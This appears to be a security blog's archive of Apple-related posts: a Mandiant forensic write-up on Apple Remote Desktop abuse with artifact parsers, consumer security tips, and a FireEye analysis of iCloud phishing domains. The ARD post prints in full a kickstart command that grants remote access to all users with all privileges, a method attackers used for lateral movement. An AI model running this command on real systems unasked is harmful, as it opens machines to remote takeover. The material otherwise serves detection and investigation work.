Category Archives: apple

Smashing Security #154: A buttock of biometrics

The UK’s Labour Party kicks off its election campaign with claims that it has suffered a sophisticated cyber-attack, Apple’s credit card is accused of being sexist, and what is Google up to with Project Nightingale?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes.

Fooling Voice Assistants with Lasers

Interesting:

Siri, Alexa, and Google Assistant are vulnerable to attacks that use lasers to inject inaudible -- and sometimes invisible -- commands into the devices and surreptitiously cause them to unlock doors, visit websites, and locate, unlock, and start vehicles, researchers report in a research paper published on Monday. Dubbed Light Commands, the attack works against Facebook Portal and a variety of phones.

Shining a low-powered laser into these voice-activated systems allows attackers to inject commands of their choice from as far away as 360 feet (110m). Because voice-controlled systems often don't require users to authenticate themselves, the attack can frequently be carried out without the need of a password or PIN. Even when the systems require authentication for certain actions, it may be feasible to brute force the PIN, since many devices don't limit the number of guesses a user can make. Among other things, light-based commands can be sent from one building to another and penetrate glass when a vulnerable device is kept near a closed window.

Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil

Attackers often make their lives easier by relying on pre-existing operating system and third party applications in an enterprise environment. Leveraging these applications assists them with blending in with normal network activity and removes the need to develop or bring their own malware. This tactic is often referred to as Living Off The Land. But what about when that land is an Apple orchard?

In recent enterprise macOS investigations, FireEye Mandiant identified the Apple Remote Desktop application as a lateral movement vector and as a source for valuable forensic artifacts.

Apple Remote Desktop (ARD) was first released in 2002 and is Apple’s “desktop management system for software distribution, asset management, and remote assistance”. An ARD deployment consists of administrator and client machines. While the administrator app must be downloaded from the macOS App Store, the client application is included natively as part of macOS. Client systems must be added to the client list on an administrator system manually, or they can be discovered via Bonjour if they are in the same local subnet as the administrator system. In a typical enterprise environment deployment, managers would be the ARD administrators and have the ability to view, manage, and remotely control their managed personnel’s workstations via ARD.

Lateral Movement

Mandiant has observed attackers using the ARD screen sharing function to move laterally between systems. If remote desktop was not enabled on a target system, Mandiant observed attackers connecting to systems via SSH and executing a kickstart command to enable remote desktop management. This allowed remote desktop access to the target systems. The following is an example from the macOS Unified Log showing a kickstart command used by an attacker to enable remote desktop access for all users with all privileges:


Figure 1: Kickstart command example

During an investigation, you can use a few different artifacts to trace this activity. Execution of the kickstart command modifies the contents of the configuration file /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd to contain the string “enabled”. SSH login activity can be found in the Apple System Logs or Audit Logs. Execution of the kickstart command can be found in the Unified Logs, as seen in Figure 1.
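
For reference, the standard Apple-documented kickstart invocation to enable remote desktop access for all users with all privileges looks similar to the following (a representative example of the class of command described above, not the exact command recovered in this investigation):

sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -allowAccessFor -allUsers -privs -all -restart -agent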

An ARD administrator has a substantial amount of power available to them; compromising such an account is similar to compromising an administrator account in a Windows environment. By compromising an account that has access to an ARD administrator system, an attacker can perform any of the following actions:

  • Remotely control VNC-enabled machines, including in “Curtain Mode” which hides the remote actions from the local workstation’s screen
  • Transfer files
  • Remotely shut down or restart multiple machines simultaneously
  • Schedule tasks
  • Execute AppleScript and UNIX shell scripts

Apple’s ARD web page and the ARD help page contain more details about ARD’s capabilities.

ARD Reporting as a Forensic Force Multiplier

Along with remote system control functionality, Apple Remote Desktop’s asset management capabilities include conducting remote Spotlight searches, file searching, generating software version information reports, and more importantly, generating application usage and user history reports. The reporting process generally follows these steps:

  1. Client systems compute reports and cache the data locally before transferring them to the administrator system (the default policy is to begin this at 12:00 AM local time, daily).
  2. Data received from clients is cached on the administrator system. Alternatively, a macOS system with the administrator version of ARD installed can be set up as a “Task Server” for a centralized collection option.
  3. Cached data is written to a SQLite database on the administrator system.

The cached data is stored in various subdirectories under the /private/var/db/RemoteManagement/ parent directory. The directory has the following structure:


Figure 2: /private/var/db/RemoteManagement/ directory structure

This directory structure is present on all systems, but which files exist in which directories depends on whether the system is an ARD client or administrator system.

Artifacts from ARD Client Systems

There is one directory that is the focus for investigations on client systems: /private/var/db/RemoteManagement/caches/. This directory contains the following files, which make up the local client data cache that is periodically reported to the administrator system. Note, however, that these files are routinely deleted once they have been transmitted to the administrator system, so they may not be present; after transmission, the data lives on the administrator system.

| File | Description |
|---|---|
| AppUsage.plist | plist file containing application usage data |
| AppUsage.tmp | Binary plist file containing application usage data, often the same as or less thorough than AppUsage.plist |
| asp.cache | Binary plist of system information |
| filesystem.cache | Database containing an index of the entire file system, including users and groups |
| sysinfo.cache | Binary plist containing system information, some of which is also present in asp.cache |
| UserAcct.tmp | Binary plist containing user login activity |

Table 1: ARD cache files

In our experience, the most useful information available from these files is application usage and user activity.

Application Usage

The RemoteManagement/caches/AppUsage.plist file contains one key per application, where each key is the full path of the application, such as file:///Applications/Calculator.app/.

Each application key contains a dictionary that includes a “runData” array and a “Name” string, which is the friendly name of the application, such as “Calculator”, as seen in Figure 3.


Figure 3: AppUsage.plist structure

Each “runData” array contains at least one dictionary consisting of the following keys and values:

| Key | Value Format | Description |
|---|---|---|
| wasQuit | Boolean: true or false | Indicator of whether or not the application was quit prior to the last report time. This field may not exist if the value is not "true". |
| Frontmost | Number of seconds | Total duration which the application was "frontmost" on the screen |
| Launched | macOS absolute timestamp | Time the application was launched |
| runLength | Number of seconds | Duration the application was run |
| username | String | User who launched the application |

Table 2: AppUsage.plist runData keys and values

Of the two application usage cache artifacts, RemoteManagement/caches/AppUsage.plist usually contains the same or more content than RemoteManagement/caches/AppUsage.tmp.
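
As a minimal sketch of how this data can be reviewed (assuming Python 3, a copy of AppUsage.plist in the working directory, and the key layout described above), the plist can be parsed with the standard plistlib module:

```python
import plistlib
from datetime import datetime, timedelta

# macOS "absolute" timestamps are seconds since 2001-01-01 00:00:00 (UTC)
COCOA_EPOCH = datetime(2001, 1, 1)

with open("AppUsage.plist", "rb") as f:
    app_usage = plistlib.load(f)  # plistlib auto-detects XML vs. binary plists

for app_url, app_info in app_usage.items():
    name = app_info.get("Name", app_url)
    for run in app_info.get("runData", []):
        launched = COCOA_EPOCH + timedelta(seconds=run["Launched"])
        print(f"{name}: launched {launched} by {run.get('username', 'unknown')}, "
              f"ran {run.get('runLength', 0):.0f}s, "
              f"frontmost {run.get('Frontmost', 0):.0f}s")
```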

User Activity

The RemoteManagement/caches/UserAcct.tmp file is a binary plist that contains user activity that can be correlated with other artifacts on a macOS system, such as the Apple System Logs or Audit Logs. The file contains keys with the short name of each user who has logged on to the system.

Each key contains a dictionary that includes a “uid” string with the user’s UID, and an array for each login type: console, tty, or SSH. Each login-type array contains at least one dictionary consisting of the following keys and values:

| Key | Value Format | Description |
|---|---|---|
| inTime | macOS absolute timestamp | Time the user logged in |
| outTime | macOS absolute timestamp | Time the user logged out |
| host | String | Originating host for remote login. This field has been observed to not be consistently present. |

Table 3: UserAcct.tmp keys and values
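
A similar sketch (again assuming Python 3 and the key layout in Table 3) lists the login sessions recorded in UserAcct.tmp per user and login type:

```python
import plistlib
from datetime import datetime, timedelta

COCOA_EPOCH = datetime(2001, 1, 1)  # base for macOS absolute timestamps

with open("UserAcct.tmp", "rb") as f:
    user_acct = plistlib.load(f)

for user, details in user_acct.items():
    uid = details.get("uid")
    for login_type in ("console", "tty", "ssh"):
        for session in details.get(login_type, []):
            in_time = COCOA_EPOCH + timedelta(seconds=session["inTime"])
            host = session.get("host", "local/unknown")
            print(f"{user} (uid {uid}) {login_type} login at {in_time} from {host}")
```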

Artifacts From ARD Administrator Systems

The data outlined in Table 1 is reported to the administrator system daily. The files are then stored in the RemoteManagement/ClientCaches/ directory. Each file is renamed to the MAC address of the reporting system and placed into the appropriate subdirectory, as seen in Table 4. The subdirectories contain the following:

| Subdirectory | Data Contained in Each File |
|---|---|
| ApplicationUsage/ | AppUsage.plist files |
| SoftwareInfo/ | Filesystem.cache files |
| SystemInfo/ | Sysinfo.cache files |
| UserAccounting/ | UserAcct.tmp files |

Table 4: /private/var/db/RemoteManagement/ClientCaches/ subdirectories
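
As a small triage aid on an administrator system, the Table 4 subdirectories can be enumerated to see which clients have reported which cache types (a sketch assuming the default path and layout above):

```python
import os

CLIENT_CACHES = "/private/var/db/RemoteManagement/ClientCaches"

# Group reported cache files by the MAC-address filename they were renamed to
clients = {}
for subdir in ("ApplicationUsage", "SoftwareInfo", "SystemInfo", "UserAccounting"):
    path = os.path.join(CLIENT_CACHES, subdir)
    if not os.path.isdir(path):
        continue
    for name in os.listdir(path):
        clients.setdefault(name, []).append(subdir)

for mac, sources in sorted(clients.items()):
    print(mac, "->", ", ".join(sources))
```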

Additionally, there is a plist file, RemoteManagement/ClientCaches/cacheAccess.plist, that contains keys of MAC addresses with values of more MAC addresses. The purpose and context of this file have yet to be determined.

The Gold Mine

All the aforementioned data, with the exception of the filesystem.cache files, is added to the main SQLite database RemoteManagement/RMDB/rmdb.sqlite3 (“RMDB”). The RMDB exists on all ARD systems but is only populated on the administrator system. It houses a wealth of information about the systems in the ARD network over a significant timespan. Mandiant has observed data for application usage timestamps from over a year prior to when we acquired a database on a live system.

The RMDB file contains five tables: ApplicationName, ApplicationUsage, PropertyNameMap, SystemInformation, and UserUsage. The following sections detail each table within the database:

ApplicationName

This table is an index for the applications on each system, where each application is assigned an item sequence number (“ItemSeq”) per system. This data is used for correlation in the ApplicationUsage table.

| Column | Value Format | Description |
|---|---|---|
| ComputerID | String | Client MAC address, no separators |
| AppName | String | Friendly application name |
| AppURL | String | Application URL path (i.e. file:///Applications/Calculator.app) |
| ItemSeq | Integer | ID number for each application, per ComputerID, used for the AppName table |
| LastUpdated | macOS absolute timestamp | Last report time of the client |

Table 5: ApplicationName table columns

ApplicationUsage

The ApplicationUsage table is unique in that the "Frontmost" and "LaunchTime" values in the table are swapped. The research at the time of this blog post was verified on macOS 10.14 (Mojave).

| Column | Value Format | Description |
|---|---|---|
| ComputerID | String | Client MAC address, no separators |
| FrontMost | macOS absolute timestamp | Application launch time |
| LaunchTime | Number of seconds to 6 decimal places | Total duration the application was "frontmost" on screen |
| RunLength | Number of seconds to 6 decimal places | Total duration the application was running |
| ItemSeq | Integer | ItemSeq number for the respective ComputerID, referenced in the ApplicationName table |
| LastUpdated | macOS absolute timestamp | Last report time of the client |
| UserName | String | User who launched the application |
| RunState | Integer | "1" for "running", or "0" for "terminated" at the time of the last report |

Table 6: ApplicationUsage table columns
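
To illustrate how these two tables fit together, the following sketch (Python with the standard sqlite3 module, assuming a copy of rmdb.sqlite3 and the column names described above) resolves ItemSeq references and lists application launches per client:

```python
import sqlite3
from datetime import datetime, timedelta

COCOA_EPOCH = datetime(2001, 1, 1)  # base for macOS absolute timestamps

conn = sqlite3.connect("rmdb.sqlite3")

# Join usage records to friendly application names via (ComputerID, ItemSeq).
# Note the swapped columns described above: FrontMost holds the launch timestamp
# and LaunchTime holds the frontmost duration.
query = """
SELECT u.ComputerID, n.AppName, u.UserName, u.FrontMost, u.RunLength
FROM   ApplicationUsage u
JOIN   ApplicationName  n
       ON u.ComputerID = n.ComputerID AND u.ItemSeq = n.ItemSeq
ORDER BY u.FrontMost
"""

for computer_id, app, user, launch_ts, run_len in conn.execute(query):
    launched = COCOA_EPOCH + timedelta(seconds=launch_ts)
    print(f"{computer_id}  {launched}  {user}  {app}  ran {run_len:.0f}s")
```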

PropertyNameMap

This table is used as a reference for the SystemInformation table.

| Column | Value Format | Description |
|---|---|---|
| ObjectName | String | Various elements of a macOS system, such as Mac_HardDriveElement, Mac_USBDeviceElement, Mac_SystemInfoElement |
| PropertyName | String | Property names for each element, such as ProductName, ProductID, VendorID, VendorName for Mac_USBDeviceElement |
| PropertyMapID | Integer | ID number for each property, per element |

Table 7: PropertyNameMap table columns

SystemInformation

There is a substantial amount of system information collected in this table. It can be leveraged to extract USB device information, IP addresses, hostnames, and more from all the reported client systems.

| Column | Value Format | Description |
|---|---|---|
| ComputerID | String | Client MAC address, with colon separators |
| ObjectName | String | Elements of a macOS system outlined in the PropertyNameMap table |
| PropertyName | String | Properties per element outlined in the PropertyNameMap table |
| ItemSeq | Integer | ID number for each element, i.e. if there are 4 Mac_USBDeviceElement data sets, each one will have an ItemSeq number, 0-3, to group the properties together |
| Value | String | Data for the respective property |
| LastUpdated | yyyy-mm-ddThh:mm:ssZ | 24 hour local time, last report time of the client. Example: 2019-08-07T02:11:34Z |

Table 8: SystemInformation table columns
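
For example, USB device details could be pulled from this table with a query along the following lines (a sketch assuming the schema above; the property names come from the Mac_USBDeviceElement examples in Table 7):

```python
import sqlite3

conn = sqlite3.connect("rmdb.sqlite3")

# ItemSeq groups the properties of a single Mac_USBDeviceElement together
query = """
SELECT ComputerID, ItemSeq, PropertyName, Value
FROM   SystemInformation
WHERE  ObjectName = 'Mac_USBDeviceElement'
ORDER BY ComputerID, ItemSeq
"""

devices = {}
for computer_id, item_seq, prop, value in conn.execute(query):
    devices.setdefault((computer_id, item_seq), {})[prop] = value

for (computer_id, item_seq), props in sorted(devices.items()):
    print(computer_id, props.get("VendorName"), props.get("ProductName"))
```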

UserUsage

This table contains the user login activity for all the reported client systems.

| Column | Description of Value |
|---|---|
| ComputerID | Client MAC address, no separators |
| LastUpdated | macOS absolute timestamp, last report time of the client |
| UserName | Short name of the user |
| LoginType | Console, tty, or ssh |
| inTime | macOS absolute timestamp, time the user logged in |
| outTime | macOS absolute timestamp, time the user logged out |
| Host | Originating host for remote login. This field has been observed to not be consistently present. |

Table 9: UserUsage table columns
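
A sketch along the same lines (again assuming the schema above) recovers login activity from UserUsage, which is often the first place to look when tracing lateral movement:

```python
import sqlite3
from datetime import datetime, timedelta

COCOA_EPOCH = datetime(2001, 1, 1)  # base for macOS absolute timestamps

conn = sqlite3.connect("rmdb.sqlite3")

# Add e.g. WHERE LoginType = 'ssh' to focus on remote logins (the exact literal
# values stored in LoginType should be confirmed against the database at hand)
query = """
SELECT ComputerID, UserName, LoginType, inTime, outTime, Host
FROM   UserUsage
ORDER BY inTime
"""

for computer_id, user, login_type, in_ts, out_ts, host in conn.execute(query):
    logged_in = COCOA_EPOCH + timedelta(seconds=in_ts)
    logged_out = COCOA_EPOCH + timedelta(seconds=out_ts) if out_ts else "n/a"
    print(f"{user}@{computer_id}  {login_type}  in: {logged_in}  out: {logged_out}  host: {host or 'n/a'}")
```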

Filesystem Cache

The RemoteManagement/ClientCaches/filesystem.cache file is a database that indexes the files and directories found on a macOS computer’s file system. Rather than using SQLite like the RMDB, ARD uses a custom database implementation to track this information. Fortunately, the database file format is fairly simple, consisting of a file header, six tables, and entries that point to string values. By interpreting the information in the filesystem cache file, an investigator can recreate the directory structure of an ARD-enabled system. Mandiant uses this technique to identify and demonstrate the existence of attacker-created files.

The database header, identified by the magic value “hdix”, contains metadata about the database, such as the total number of indexed folders, files, and symlinks. Pointers from this header lead to the six tables: “main”, “names” (file names), “kinds” (file extensions), “versions” (macOS app bundle version infos), “users”, and “groups”. Entries in the “main” table contain references to entries in the other tables; by walking these references, an investigator can recover full file system paths and metadata.
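
A full parser is beyond the scope of this post (ARDvark, introduced below, implements one), but a minimal sanity check for candidate files might look like the following sketch, which only verifies the "hdix" magic described above and assumes it sits at the start of the file:

```python
def looks_like_filesystem_cache(path: str) -> bool:
    """Return True if the file begins with the 'hdix' header magic (assumed to be at offset 0)."""
    with open(path, "rb") as f:
        return f.read(4) == b"hdix"

if looks_like_filesystem_cache("filesystem.cache"):
    print("Header magic matches; candidate ARD file system cache")
```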

In practice, the filesystem.cache file may be tens of megabytes in size, tracking dozens or hundreds of thousands of file system entries. Figure 4 shows truncated content of a parsed file system cache file; these entries are for the artifacts discussed in this article!


Figure 4: Screenshot of filesystem.cache contents, listing ARD artifacts

On a macOS system, the program “build_hd_index” traverses the file system and indexes the files and directories into filesystem.cache. Figure 5 shows a portion of the documentation for this tool; as expected, the default output directory is [/private]/var/db/RemoteManagement/caches/.


Figure 5: documentation for build_hd_index

Ironically, internet message board posts going back to at least 2007 complain of the performance impact of this tool. A post by “Anonymous” indicates that “build_hd_index” was designed to support file indexing on OS X Panther (2003), which didn’t have Spotlight. Now, 16 years later, we can exploit these artifacts during an incident response.

Introducing: ARDvark

If this artifact is present in a future investigation, leveraging its wealth of data will be critical to identifying attacker activity. In some scenarios, investigators may be able to generate reports directly from an ARD administrator system, but this may not always be the case. If not, investigators would have to rely on manually acquiring and extracting information from the RMDB file on the ARD administrator system. ARDvark is a tool that extracts all user activity and application usage recorded in the RMDB and outputs the data in an analyst-friendly format.

ARDvark will also process the AppUsage.plist and UserAcct.tmp files found on ARD client systems under /private/var/db/RemoteManagement/caches/. Additionally, ARDvark can parse the filesystem.cache files to produce a file system listing, as well as all users and groups present on the respective system. Please see the FireEye GitHub for more information.

Detecting and Preventing ARD Abuse

To detect suspicious ARD usage, organizations can monitor for anomalous modification of the /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd file to identify remote desktop access being enabled where ARD is not expected to be in use. Analyzing the Unified Logs for evidence of unexpected kickstart commands during threat hunting missions can also uncover suspicious ARD usage.
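
On systems with Unified Logging, one hedged starting point for such hunting (the exact predicate may need tuning per macOS version) is:

log show --info --last 30d --predicate 'eventMessage CONTAINS[c] "kickstart"'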

Mitigating ARD abuse relies on the principle of least privilege. Mandiant recommends allowing as few remote control privileges as possible, and granting administrator privileges only to necessary accounts. Apple provides guidance on setting privileges, and on authenticating to ARD without using local accounts, in the help page and in the ARD user guide. ARD administrators can then routinely generate reports in the ARD application to ensure no changes are made to administration privilege settings.

A Bushel of Evidence

Application usage artifacts for macOS are few and far between. To date, some of the best artifacts for application usage include CoreAnalytics files and the Spotlight database, but none of these artifacts provide the exact time of execution of all applications. While ARD artifacts are not present on every macOS system, if ARD is deployed in an enterprise environment it may provide some of the most valuable data for investigators, data that would not be uncovered otherwise.

User login activity typically exists in the Apple System Logs and Audit Logs, but short log retention is frequently an issue when the average attacker dwell time in 2018 was 78 days. The RMDB provides a potential source of application usage and user login information that is over a year old, long outliving typical log retention times.

The system information available in the RMDB includes IP addresses, USB device information, and more, which may be useful to investigators. Also, the collected file system cache files contain an extensive file listing of multiple macOS systems, which allows investigators to identify files or users of interest on other systems without having to collect data from the suspect system directly.

ARD is an excellent example of how remote administration tools provide an attack surface for abuse while simultaneously providing a vast amount of data to help piece together malicious activity, all from a single system. If your organization utilizes ARD, consider reviewing the information available through the reporting functionality during threat hunting and future investigations, as the artifact doesn’t fall far from the tree.

iPhone Users: Here’s What You Need to Know About the Latest iOS Hacks

iPhone hacks have often been considered a rare occurrence. However, a group of Google researchers recently discovered that someone has been exploiting multiple iPhone vulnerabilities for the last two years. How? Simply by getting users to visit a website.

How exactly does this exploitation campaign work? According to WIRED, researchers revealed a handful of websites that had assembled five exploit chains. These exploit chains are tools that link security vulnerabilities together and allow a hacker to penetrate each layer of iOS digital protections. This campaign took advantage of 14 security flaws, resulting in the attacker gaining complete control over a user’s phone. Researchers state that these malicious sites were programmed to assess the Apple devices that loaded them and compromise the devices with powerful monitoring malware if possible. Once the malware was installed, it could monitor live location data, grab photos, contacts, passwords, or other sensitive information from the iOS Keychain.

So, what makes this attack unique? For starters, this exploitation campaign hides in plain sight, uploading information without any encryption. If a user monitored their network traffic, they would notice activity as their data was being uploaded to the hacker’s server. Additionally, a user would be able to see suspicious activity if they connected their device to their computer and reviewed console logs. Console logs show the codes for the programs being run on the device. However, since this method would require a user to take the extra step of plugging their iPhone into a computer, it’s highly unlikely that they would notice the suspicious activity.

Although iOS exploits usually require a variety of complexities to be successful, this exploitation campaign proves that iOS hacking is very much alive and kicking. So, what can Apple users do to help ward off these kinds of attacks? Here’s how you can help keep your device secure:

  • Install automatic updates. In your device settings, choose to have automatic updates installed on your device. This will ensure that you have the latest security patches for vulnerabilities like the ones leveraged in these exploit chains as soon as they’re available.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.


Uighurs in China were target of two-year iOS malware attack – reports

Android and Windows devices also targeted in campaign believed to be state-backed

Chinese Uighurs were the target of an iOS malware attack lasting more than two years that was revealed last week, according to multiple reports.

Android and Windows devices were also targeted in the campaign, which took the form of “watering hole attacks”: taking over commonly visited websites or redirecting their visitors to clones in order to indiscriminately attack each member of a community.

Related: China’s hi-tech war on its Muslim minority


Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks

Many of us use Bluetooth technology for its convenience and sharing capabilities. Whether you’re using wireless headphones or quickly Airdropping photos to your friend, Bluetooth has a variety of benefits that users take advantage of every day. But like many other technologies, Bluetooth isn’t immune to cyberattacks. According to Ars Technica, researchers have recently discovered a weakness in the Bluetooth wireless standard that could allow attackers to intercept device keystrokes, contact lists, and other sensitive data sent from billions of devices.

The Key Negotiation of Bluetooth attack, or “KNOB” for short, exploits this weakness by forcing two or more devices to choose an encryption key just a single byte in length before establishing a Bluetooth connection, allowing attackers within radio range to quickly crack the key and access users’ data. From there, hackers can use the cracked key to decrypt data passed between devices, including keystrokes from messages, address books uploaded from a smartphone to a car dashboard, and photos.

What makes KNOB so stealthy? For starters, the attack doesn’t require a hacker to have any previously shared secret material or to observe the pairing process of the targeted devices. Additionally, the exploit keeps itself hidden from Bluetooth apps and the operating systems they run on, making it very difficult to spot the attack.

While the Bluetooth Special Interest Group (the body that oversees the wireless standard) has not yet provided a fix, there are still several ways users can protect themselves from this threat. Follow these tips to help keep your Bluetooth-compatible devices secure:

  • Adjust your Bluetooth settings. To avoid this attack altogether, turn off Bluetooth in your device settings.
  • Beware of what you share. Make it a habit to not share sensitive, personal information over Bluetooth.
  • Turn on automatic updates. A handful of companies, including Microsoft, Apple, and Google, have released patches to mitigate this vulnerability. To ensure that you have the latest security patches for vulnerabilities such as this, turn on automatic updates in your device settings.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


How to Build Your 5G Preparedness Toolkit

5G has been nearly a decade in the making but has really dominated the mobile conversation in the last year or so. This isn’t surprising considering the potential benefits this new type of network will provide to organizations and users alike. However, just like with any new technological advancement, there are a lot of questions being asked and uncertainties being raised around accessibility, as well as cybersecurity. The introduction of this next-generation network could bring more avenues for potential cyberthreats, potentially increasing the likelihood of distributed denial-of-service (DDoS) attacks due to the sheer number of connected devices. However, as valid as these concerns may be, we may be getting a bit ahead of ourselves here. While 5G has gone from an idea to a reality in a short amount of time for a handful of cities, these advancements haven’t happened without a series of setbacks and speedbumps.

In April 2019, Verizon was the first to launch a next-generation network, with other cellular carriers following closely behind. While a technological milestone in and of itself, 5G networks are so far only available in select cities, and even then often limited to specific parts of the city. Beyond the not-so-widespread availability of 5G, the network’s internet speeds have varied widely depending on the cellular carrier. Even if users are located in a 5G-enabled area, without a 5G-enabled phone they will not be able to access all the benefits the network provides. These three factors – user location, network limitations of certain wireless carriers, and availability of 5G-enabled smartphones – must align for users to take full advantage of this exciting innovation.

While there is still a lot of uncertainty surrounding the future of 5G, as well as what cyberthreats may emerge as a result of its rollout, there are a few things users can do to prepare for the transition. To get your cybersecurity priorities in order, take a look at our 5G preparedness toolkit to ensure you’re prepared when the nationwide roll-out happens:

  • Follow the news. Since the announcement of a 5G enabled network, stories surrounding the network’s development and updates have been at the forefront of the technology conversation. Be sure to read up on all the latest to ensure you are well-informed to make decisions about whether 5G is something you want to be a part of now or in the future.
  • Do your research. With new 5G-enabled smartphones about to hit the market, ensure you pick the right one for you, as well as one that aligns with your cybersecurity priorities. The right decision for you might be to keep your 4G-enabled phone while the kinks and vulnerabilities of 5G get worked out. Just be sure that you are fully informed before making the switch and that all of your devices are protected.
  • Be sure to update your IoT devices’ factory settings. 5G will enable more and more IoT products to come online, and most of these connected products aren’t necessarily designed to be “security first.” A device may be vulnerable as soon as the box is opened, and many cybercriminals know how to get into vulnerable IoT devices via default settings. By changing the factory settings, you can instantly upgrade your device’s security and ensure your home network is secure.
  • Add an extra layer of security. As mentioned, with 5G creating more avenues for potential cyberthreats, it is a good idea to invest in comprehensive mobile security for all of your devices to stay secure while on the go or at home.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.


Downloaded FaceApp? Here’s How Your Privacy Is Now Affected

If you’ve been on social media recently, you’ve probably seen some people in your feed posting images of themselves looking elderly. That’s because FaceApp, an AI face editor that went viral in 2017, is making a major comeback with the so-called FaceApp Challenge — where celebrities and others use the app’s old age filter to add decades onto their photos. While many folks have participated in the fun, there are some concerns about the way that the app operates when it comes to users’ personal privacy.

According to Forbes, over 100 million people have reportedly downloaded FaceApp from the Google Play Store, and the app is the number one downloaded app on the Apple App Store in 121 different countries. But what many of these users are unaware of is that when they download the app, they are granting FaceApp full access to the photos they have uploaded. The company can then use these photos for its benefit, such as training its AI facial recognition algorithm. And while there is currently nothing to indicate that the app is taking photos for malicious intent, it is important for users to be aware that their personal photos may be used for other purposes beyond the original intent.

So, how can users enjoy the entertainment of apps like FaceApp without sacrificing their privacy? Follow these tips to help keep your personal information secure:

  • Think before you upload. It’s always best to err on the side of caution with any personal data and think carefully about what you are uploading or sharing. A good security practice is to only share personal data, including personal photos, when it’s truly necessary.
  • Update your settings. If you’re concerned about FaceApp having permission to access your photos, it’s time to assess the tools on your smartphone. Check which apps have access to information like your photos and location data. Change permissions by either deleting the app or changing your settings on your device.
  • Understand and read the terms. Consumers can protect their privacy by reading the Privacy Policy and terms of service and knowing who they are dealing with.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


Rotten Apples: Apple-like Malicious Phishing Domains

At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some phishing domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These phony Apple domains were involved in phishing attacks against Apple iCloud users in China and the UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique in that they serve the same malicious phishing content from different domains to target Apple users.

Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer.

iCloud ensures that users always have the latest versions of their important information – including documents, photos, notes, and contacts – on all of their Apple devices. iCloud provides an easy interface to share photos, calendars, locations and more with friends and family, and even helps users find their device if they lose it. Perhaps most importantly, its iCloud Keychain feature allows users to store passwords and credit card information and have it entered automatically on their iOS devices and Mac computers.

Anyone with access to an Apple ID, password and some additional information, such as date of birth and device screen lock code, can completely take over the device and use the credit card information to impersonate the user and make purchases via the Apple Store.

This blog highlights some highly organized and sophisticated phishing attack campaigns we observed targeting Apple customers.

Campaign 1: Zycode phishing campaign targeting Apple's Chinese Customers

This phishing kit is named “zycode” after the value of a password variable embedded in the JavaScript code which all these domains serve in their HTTP responses.

The following is a list of phishing domains targeting Apple users detected by our automated system in March 2016. None of these domains are registered by Apple, nor are they pointing to Apple infrastructure:

The list shows that the attackers are attempting to mimic websites related to iTunes, iCloud and Apple ID, which are designed to lure and trick victims into submitting their Apple IDs.

Most of these domains appeared as an Apple login interface for Apple ID, iTunes and iCloud. The domains were serving highly sophisticated, obfuscated and suspicious JavaScript, which created the phishing HTML content on the web page. This technique is effective against anti-phishing systems that rely on the HTML content and analyze the forms.

From March 7 to March 12, the following domains used for Apple ID phishing were observed, all of which were registered by a few entities in China using a qq[.]com email address: iCloud-Apple-apleid[.]com, Appleid-xyw[.]com, itnues-appid[.]com, AppleidApplecwy[.]com, appie-itnues[.]com, AppleidApplecwy[.]com, Appleid-xyw[.]com, Appleid-yun-iCloud[.]com, iCloud-Apple-apleid[.]com, iphone-ioslock[.]com, iphone-appdw[.]com.

From March 13 to March 20, we observed these new domains using the exact same phishing content, and having similar registrants: iCloud-Appleid-yun[.]win, iClouddd[.]top, iCloudee[.]top, iCloud-findip[.]com, iCloudhh[.]top, ioslock-Apple[.]com, ioslock-iphone[.]com, iphone-iosl0ck[.]com, lcloudmid[.]com

On March 30, we observed the following newly registered domains serving this same content: iCloud-mail-Apple[.]com, Apple-web-icluod[.]com, Apple-web-icluodid[.]com, AppleidAppleiph[.]com, icluod-web-ios[.]com and ios-web-Apple[.]com

Phishing Content and Analysis

Phishing content is usually available in the form of simple HTML, referring to images that mimic a target brand and a form to collect user credentials. Phishing detection systems look for special features within the HTML content of the page, which are used to develop detection heuristics. This campaign is unique as a simple GET request to any of these domains results in an encoded JavaScript content in the response, which does not reveal its true intention unless executed inside a web browser or a JavaScript emulator. For example, the following is a brief portion of the encoded string taken from the code.

This encoded string strHTML goes through a complex sequence of around 23 decrypting/decoding functions, including number system conversions and pseudo-random pattern modifiers, followed by XOR decoding using the fixed key or password “zycode”, before the actual HTML phishing content is finally created (refer to Figure 15 and Figure 16 in Appendix 1 for the complete code). Phishing detection systems that rely solely on the HTML in the response section will completely fail to detect the code generated using this technique.
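
To illustrate only the final stage of that scheme (not the campaign’s actual multi-stage decoder), XOR decoding with a short repeating key such as “zycode” amounts to something like the following sketch:

```python
def xor_decode(data: bytes, key: bytes = b"zycode") -> bytes:
    """XOR each byte of data against the repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# XOR with a fixed key is symmetric: encoding and decoding are the same operation
ciphertext = xor_decode(b"<html>example</html>")
assert xor_decode(ciphertext) == b"<html>example</html>"
```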

Once loaded into the web browser, this obfuscated JavaScript creates an iCloud phishing page. This page is shown in Figure 1.

Figure 1: The page created by the obfuscated JavaScript as displayed in the browser

The page is created by the de-obfuscated content seen in Figure 2.

Figure 2: Deobfuscated content

